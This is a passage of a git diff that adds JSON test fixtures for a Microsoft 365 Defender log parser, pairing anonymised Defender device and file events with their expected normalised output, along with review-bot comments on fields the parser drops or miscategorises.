bcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": 
"device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file 
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..fea26327a --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json 
@@ -0,0 +1,81 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": 
"powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..672754009 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json 
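Review bot: The executed command in this PowerShellCommand event — `AdditionalFields` carries `{"Command":"nslookup.exe user01-domain.USER01.local 1.2.3.4"}` — appears nowhere in the expected output: `process.command_line` is only `powershell.exe` and no `action.properties` key carries the nested `Command`. For this action type the command text is the field an analyst or a detection rule will actually pivot on, so the fixture is currently pinning its loss. It would be worth parsing `AdditionalFields` as JSON in the device_events stage and exposing the `Command` value (for instance under `action.properties.AdditionalFields` or a dedicated key), then updating this fixture to assert it.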
@@ -0,0 +1,99 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files 
(x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "parent": { + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json new file mode 100644 index 000000000..73d8718f8 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json 
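Review bot: This fixture pins `ShellLinkCreateFileEvent` to `"category": ["host"]` and `"type": ["info"]` even though the expected output populates `file.name`, `file.directory` and `file.hash.*`, while the `FileCreated` fixture added in this same commit classifies an equivalent file creation as `"category": ["file"]`. If the parser categorises by source table rather than by `ActionType`, that is presumably the cause, but from a detection standpoint the two creation events then land in different ECS categories; `"category": ["file"]` with `"type": ["creation"]` would make them consistent, or a comment in the parser should record why DeviceEvents stays under `host`. Also note that `process.args` keeps the shell quoting of each token (`"\"I:\\COMPANY\\Service\\FILE.doc\""`, `"\"\""`) and is emitted in sorted rather than positional order, so anything matching on args will see quoted, reordered values; if that is intended, it deserves a short comment next to the args step in the parser.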
@@ -0,0 +1,107 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT 
DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe 
